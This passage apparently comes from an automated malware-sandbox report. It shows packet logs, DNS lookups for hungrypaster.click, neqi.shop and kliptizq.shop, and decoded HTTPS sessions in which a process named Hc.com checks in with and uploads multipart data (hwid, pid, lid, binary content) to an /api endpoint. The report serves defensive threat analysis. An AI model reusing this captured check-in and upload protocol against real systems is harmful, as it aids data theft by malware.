                                                                                                                                                                      Dec 24, 2024 01:34:00.437963963 CET49744443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.438004017 CET44349744188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.499797106 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.499849081 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:00.499934912 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.500263929 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:00.500279903 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.741386890 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.741477966 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.742779016 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.742790937 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.743288040 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:01.744474888 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.744599104 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:01.744632959 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.606930017 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.607029915 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.607079983 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.616746902 CET49745443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.616766930 CET44349745188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.868071079 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868159056 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:02.868273020 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868662119 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:02.868740082 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.082020044 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.082294941 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.083415985 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.083489895 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.083827972 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.084883928 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085077047 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085123062 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:04.085199118 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:04.085215092 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057188988 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057451963 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.057547092 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.057634115 CET49746443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.057671070 CET44349746188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.158727884 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.158771038 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:05.158863068 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.159158945 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:05.159176111 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.375575066 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.375667095 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.376941919 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.376954079 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.377281904 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:06.378469944 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.378571987 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:06.378576994 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426314116 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426450968 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.426517010 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.426707983 CET49747443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.426726103 CET44349747188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.471894979 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.471929073 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:07.472002029 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.472349882 CET49748443192.168.2.4188.114.97.6
                                                                                                                                                                      Dec 24, 2024 01:34:07.472362995 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.690772057 CET44349748188.114.97.6192.168.2.4
                                                                                                                                                                      Dec 24, 2024 01:34:08.690903902 CET49748443192.168.2.4188.114.97.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 01:33:28.740255117 CET | 54776 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 01:33:28.954544067 CET | 53 | 54776 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 01:33:53.542830944 CET | 64964 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 01:33:53.797873974 CET | 53 | 64964 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 01:34:11.620290995 CET | 59171 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 01:34:11.835616112 CET | 53 | 59171 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 01:34:16.652148962 CET | 62124 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 01:34:16.881505966 CET | 53 | 62124 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 01:33:28.740255117 CET | 192.168.2.4 | 1.1.1.1 | 0x15db | Standard query (0) | PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:33:53.542830944 CET | 192.168.2.4 | 1.1.1.1 | 0xf2c3 | Standard query (0) | hungrypaster.click | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:11.620290995 CET | 192.168.2.4 | 1.1.1.1 | 0x765e | Standard query (0) | neqi.shop | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:16.652148962 CET | 192.168.2.4 | 1.1.1.1 | 0x21e4 | Standard query (0) | kliptizq.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 01:33:28.954544067 CET | 1.1.1.1 | 192.168.2.4 | 0x15db | Name error (3) | PvXlInYKrSNwyXWSA.PvXlInYKrSNwyXWSA | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:33:53.797873974 CET | 1.1.1.1 | 192.168.2.4 | 0xf2c3 | No error (0) | hungrypaster.click | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:33:53.797873974 CET | 1.1.1.1 | 192.168.2.4 | 0xf2c3 | No error (0) | hungrypaster.click | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:11.835616112 CET | 1.1.1.1 | 192.168.2.4 | 0x765e | No error (0) | neqi.shop | | 172.67.169.205 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:11.835616112 CET | 1.1.1.1 | 192.168.2.4 | 0x765e | No error (0) | neqi.shop | | 104.21.27.229 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:16.881505966 CET | 1.1.1.1 | 192.168.2.4 | 0x21e4 | No error (0) | kliptizq.shop | | 104.21.84.113 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 01:34:16.881505966 CET | 1.1.1.1 | 192.168.2.4 | 0x21e4 | No error (0) | kliptizq.shop | | 172.67.191.144 | A (IP address) | IN (0x0001) | false
• hungrypaster.click
• neqi.shop
• kliptizq.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 188.114.97.6 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:33:55 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: hungrypaster.click
2024-12-24 00:33:55 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-24 00:33:56 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 00:33:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ik1k4v5jhkr6l1he5notcfkg8p; expires=Fri, 18 Apr 2025 18:20:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I7ereWxw32eFyXUK9hhLRsRbknk6Fqv%2Fn9ZNFGFfAZQAx03%2B3AM1j%2BNkCML0m2bIzWu916qgDcs14odtja9v9mOQSdNfIvgRPpS1tZK7zCaO3ZhQdT2z3CfSKJvjYUC849km52g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6c80b0ee748c8a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1980&rtt_var=756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1435594&cwnd=248&unsent_bytes=0&cid=d6bb22e8317d7418&ts=1037&x=0"
2024-12-24 00:33:56 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-24 00:33:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449743188.114.97.64437836C:\Users\user\AppData\Local\Temp\280366\Hc.com
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-24 00:33:57 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 77
                                                                                                                                                                      Host: hungrypaster.click
                                                                                                                                                                      2024-12-24 00:33:57 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
2024-12-24 00:33:58 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:33:57 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=4165ko0r0m4pp1750u9v1713lk; expires=Fri, 18 Apr 2025 18:20:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lfexOpZfqExJzPHddtEbA4B1ouAJ25RWPW2TOE1ZQSW2pUR3IJyTJoZGcxNVCVbM3o5XsHgRMLVypQNFKDyYlEszAbb%2FrpU26yc2Z2%2B6caN4O%2FNrdAzOVf6EIzKpaHSd2cEpC9Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80befafe4396-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1565&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1784841&cwnd=252&unsent_bytes=0&cid=4854a811246fc56c&ts=767&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49744 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:33:59 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=TIISHQNJAG16259AJ
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 18155
                                                                                                                                                                      Host: hungrypaster.click
2024-12-24 00:33:59 UTC | 15331 | OUT | Data Ascii: --TIISHQNJAG16259AJContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--TIISHQNJAG16259AJContent-Disposition: form-data; name="pid"2--TIISHQNJAG16259AJContent-Disposition: form-data; name="lid"hRjzG3--GAS--T
2024-12-24 00:34:00 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:00 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=0tkst3t2mvvhi1thmb7q6a8uj1; expires=Fri, 18 Apr 2025 18:20:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwZuARzY2sgoL0%2BG5W2tvT2iSdKb6INjwuo1pyTJLPKC1zGcanauUeDPqL0Q5OvN%2BpUsGyTGKss3e9X%2BAUgb9lnuxxTOyY9SdUKn%2Bx%2F%2Bb3KXN77i7yGjPJ0yhmnhePJFlJvIw5c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80cb9ff643ee-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=600&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19118&delivery_rate=1810291&cwnd=230&unsent_bytes=0&cid=2b44129356448c47&ts=991&x=0"
2024-12-24 00:34:00 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 00:34:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49745 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:01 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=QYR7YRM38GD4I3YU5
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                      Content-Length: 8776
                                                                                                                                                                      Host: hungrypaster.click
2024-12-24 00:34:01 UTC | 8776 | OUT | Data Ascii: --QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="pid"2--QYR7YRM38GD4I3YU5Content-Disposition: form-data; name="lid"hRjzG3--GAS--Q
2024-12-24 00:34:02 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 24 Dec 2024 00:34:02 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: PHPSESSID=49cq2kv859amrj8340e9pi910i; expires=Fri, 18 Apr 2025 18:20:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38WbVsZMoSnS81YXyBhbtiU6wMMpw8dMOeTlrvqvvxygdmsK7%2FIPYkrQFRxoespx9Tefux92cdjp1qRtWrxfHJsj%2Bm0zriW1pekGrU3m1RiC2wZF6kw6IEbMFSo19Pugzlfp9XM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8f6c80d9ee664301-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1569&rtt_var=625&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9716&delivery_rate=1702623&cwnd=166&unsent_bytes=0&cid=ebd0b6e40f14966a&ts=881&x=0"
                                                                                                                                                                      2024-12-24 00:34:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                      2024-12-24 00:34:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49746 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:04 UTC | 278 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=MFV3S0UO4HZA
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20399
  Host: hungrypaster.click
2024-12-24 00:34:04 UTC | 15331 | OUT | Data Raw: [hex dump of the multipart request body; see Data Ascii]
  Data Ascii: --MFV3S0UO4HZAContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--MFV3S0UO4HZAContent-Disposition: form-data; name="pid"3--MFV3S0UO4HZAContent-Disposition: form-data; name="lid"hRjzG3--GAS--MFV3S0UO4HZACo
2024-12-24 00:34:04 UTC | 5068 | OUT | Data Raw: [5068 bytes of non-printable binary data]
2024-12-24 00:34:05 UTC | 1131 | IN | HTTP/1.1 200 OK
  Date: Tue, 24 Dec 2024 00:34:04 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=qh4fcpln8n8hjj9gtqj0tvhlcr; expires=Fri, 18 Apr 2025 18:20:43 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5HD9PI%2FjHkunWzNZPxaz2m8BnICwkT7ggCFS90BckP18jcZFfM7UVvrjtY7haYPS6IHZ9NTkjx9ePJwUCscfIP0pDYLxDogll6k%2BHbXVvFbPXOjNFKgLjknwz44C5uAf%2BXJI0Q%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f6c80e8889141cf-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1706&rtt_var=646&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21357&delivery_rate=1684939&cwnd=169&unsent_bytes=0&cid=bf0de1171c4e2046&ts=982&x=0"
2024-12-24 00:34:05 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-24 00:34:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49747 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:06 UTC | 273 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=BDDN9MUY
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1193
  Host: hungrypaster.click
2024-12-24 00:34:06 UTC | 1193 | OUT | Data Raw: [hex dump of the multipart request body; see Data Ascii]
  Data Ascii: --BDDN9MUYContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--BDDN9MUYContent-Disposition: form-data; name="pid"1--BDDN9MUYContent-Disposition: form-data; name="lid"hRjzG3--GAS--BDDN9MUYContent-Dispositio
2024-12-24 00:34:07 UTC | 1131 | IN | HTTP/1.1 200 OK
  Date: Tue, 24 Dec 2024 00:34:07 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=kk4ic4s1abpn8heoc1bvhg21ec; expires=Fri, 18 Apr 2025 18:20:46 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5lpJPoT3TI2CvWH4ggPgFIJ4hrxny01TKm%2FBcPyzaROQxSkK8blyqgr4ZrkMkxTExUK4ftsnElZAeyWQQW%2Falr0FDZrszHlpK%2FS%2FUiE55mn9HFTxCXOse0jLPleeov3b67pneQ%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f6c80f71bf10f6b-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1520&rtt_var=586&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2102&delivery_rate=1843434&cwnd=210&unsent_bytes=0&cid=263be0049f94663c&ts=1059&x=0"
2024-12-24 00:34:07 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2024-12-24 00:34:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 188.114.97.64 | 443 | 7836 | C:\Users\user\AppData\Local\Temp\280366\Hc.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 00:34:08 UTC | 283 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=IV5EB92934TXGICS6X
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1123
  Host: hungrypaster.click
2024-12-24 00:34:08 UTC | 1123 | OUT | Data Raw: [hex dump of the multipart request body; see Data Ascii]
  Data Ascii: --IV5EB92934TXGICS6XContent-Disposition: form-data; name="hwid"0E0DEDA448A18C67165F70E3262EAA47--IV5EB92934TXGICS6XContent-Disposition: form-data; name="pid"1--IV5EB92934TXGICS6XContent-Disposition: form-data; name="lid"hRjzG3--GAS
2024-12-24 00:34:09 UTC | 1130 | IN | HTTP/1.1 200 OK
  Date: Tue, 24 Dec 2024 00:34:09 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=2tsrs975rj5sujrftouooccd19; expires=Fri, 18 Apr 2025 18:20:48 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzoimJ4D4g6DudTcBG%2By3SZstAeUzbdzyiKzS4LS2KS7h4yQb7VUan7ikmwteYZXRbH8cgovaksf0aqa6%2BbD26arF%2BSn09wKiCWwrBQuobKfQfY2JTz%2FYJ94ZZw5ihuttxkQoTY%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
